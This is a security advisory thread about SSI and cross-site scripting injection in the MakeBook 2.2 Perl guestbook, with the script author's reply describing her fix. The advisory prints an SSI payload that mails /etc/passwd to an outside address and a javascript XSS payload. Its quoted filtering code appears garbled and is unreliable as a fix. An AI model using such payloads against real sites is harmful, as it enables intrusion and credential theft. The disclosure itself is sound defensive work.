Re: SSI CSS execution in MakeBook 2.2

[Kristina Pfaff-Harris]

In-Reply-To: [EMAIL PROTECTED]

Advisory name: SSI  CSS execution in MakeBook 2.2
Advisory number: 5 
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 

Gah. This is embarassing, especially since the original advisory about 
Matt's guestbook came out frigging years ago.

~sigh~

Name, email, and text entered are now checked more rigorously, which 
should fix this bug.  I've notified all registered users of the script to 
upgrade immediately.

The fix is a quick and ugly one, and does not allow for international 
characters in either the name or the email, and thus does not allow for 
several perfectly valid email addresses, but also should eliminate the 
vulnerability. Names now are stripped of everything but A-Za-z0-9-_.'
and emails of everything but A-Za-z0-9-_.@ .

Btw, and just as a side note, does anyone actually notify the writer of 
the script/software/whatever that has an exploit anymore? (I mean besides 
just posting to BugTraq?) It would have been nice to see a note about this 
before seeing it here. :-)

Kristina

SSI CSS execution in MakeBook 2.2

[DownBload]

  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI  CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands  cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the bookfile.  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the book entries should appear, and even what pages they appear 
on...


   

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse. 
It works fine, but troubles comes when you look for security measures in 
program. When you want to sign guestbook, you have to write your name,
email address, and some text. Script does remove 'some' special-char in 
$text, but script doesn't replace special-chars in $name at all, and 
because
of that, it is possible instead of name, enter and execute some SSI(Server
Side Includes) or CSS(Cross Site Scripting) code.
'Buggy' code:
...
$name =$data{Name};
$email =$data{Email};
$text =$data{Text};
$text =~ s//lt;/g;
$text =~ s//gt;/g;
...




--[ Examples

SSI attack
~~
Name: !--#exec cmd=/bin/mail [EMAIL PROTECTED]  /etc/passwd--
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: img src=javascript:alert('HACKED BY DOWNBLOAD');
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.




--[ Solution 

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{Name};
$name  =~ s//lt;/g;
$name  =~ s//gt;/g;

$email = $data{Email};
$email =~ s//lt;/g;
$email =~ s//gt;/g;

$text = $data{Text};
$text =~ s//lt;/g;
$text =~ s//gt;/g;
...




--[ Greetz

Greetz goes to #hr.hackers irc.carnet.hr.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.